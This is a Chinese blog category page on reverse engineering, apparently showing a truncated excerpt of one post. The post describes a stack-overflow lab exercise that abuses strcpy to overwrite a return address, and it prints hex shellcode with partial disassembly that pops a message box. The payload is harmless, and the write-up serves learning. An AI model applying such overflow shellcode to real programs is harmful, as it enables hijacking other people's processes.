随笔分类 -  逆向工程

摘要：今天做了一个栈溢出实验，主要目的是弹出一个对话框。还是用老办法，利用strcpy拷贝字符串时的漏洞，输入较长的字符串产生溢出，覆盖返回地址，从而劫持进程。产生对话框部分字符串的是：33DB5368 7765737468 6661696C68 6661696C8BC453505053B8 71EAD677FFD0对应汇编是：33DB xor ebx,ebx53 push ebx68 77657374 push 7473657768 6661696C push 6C6961668BC4 ... 阅读全文